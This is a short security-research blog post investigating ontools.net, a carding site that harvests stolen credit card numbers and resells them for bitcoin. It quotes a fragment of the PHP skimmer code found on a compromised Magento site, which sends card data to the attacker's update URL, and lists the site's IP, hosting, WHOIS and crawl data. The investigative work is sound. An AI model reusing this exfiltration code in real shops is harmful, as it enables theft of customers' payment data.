ontools.net research

06-06-2017


In June of 2017 while researching a compromised website, I came across ontools.net in a snippet of bad code. after doing some investigative work, I discovered the website is used to automatically and manually collect credit card numbers, then used as a resell market where someone can purchase the card numbers using bitcoin and Perfect Money.

I signed up for the site and began to explore a bit. It's appears it's well developed, but incomplete, many of the features listed simply don't work or are missing. I didn't attempt to purchase any cards because, you know, felonies so I can't confirm that it's actually working, but they do have a pretty extenstive list of cards available in their store.

below I've included their code snippet, a few things I discovered on their site, and screenshots of the app.

Code Snippets
$update = "http://magento.ontools.net/update";$binCC = substr($data['cc_number'], 0, 6);
$subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$_SERVER['SERVER_NAME']." ".$a->geoplugin_countryName;
$xupdate = "data=".$datasend."&subject=".$subject."&server=".$_SERVER['SERVER_NAME'];
Noteable data
IP: 188.241.58.16
Host: thcservers.com
Cpanel: http://ontools.net:2082
WHO IS data
Domain Name: ONTOOLS.NET
Registry Domain ID: 1990106061_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2016-01-08T15:55:13.00Z
Creation Date: 2015-12-28T15:53:37.00Z
Registrar Registration Expiration Date: 2018-12-28T15:53:37.00Z
Registrant Name: WHOIS AGENT
Registrant Organization: WHOIS PRIVACY PROTECTION SERVICE, INC
Crawl Data
/
/member.php
/register.php
/resetpass.php
/icq:699623489
/assets
/assets/css
/assets/css/main-style.css
/assets/css/style.css
/assets/css/styles.css
/assets/js
/assets/js/cekpass.js
/assets/js/jquery-1.3.2.min.js
/assets/js/jquery.backgroundPosition.js
/assets/js/marquee.js
/assets/img
/assets/img/background.gif
/assets/img/foreground.png
/assets/img/logo.png
/assets/img/midground.png
/assets/img/user.jpg
/assets/plugins
/assets/plugins/bootstrap/
/assets/plugins/dataTables/
/assets/plugins/flot/
/assets/plugins/jquery-1.10.2.js
/assets/plugins/metisMenu/
/assets/plugins/morris/
/assets/plugins/pace/
/assets/plugins/social-buttons/
/assets/plugins/timeline/
/assets/scripts
/assets/scripts/dashboard-demo.js
/assets/scripts/flot-demo.js
/assets/scripts/morris-demo.js
/assets/scripts/siminta.js
/assets/font-awesome
/assets/font-awesome/css/
/assets/font-awesome/fonts/
Screen Shots






















© 2019 Dixon Ryder All Rights Reserved.
Privacy & Terms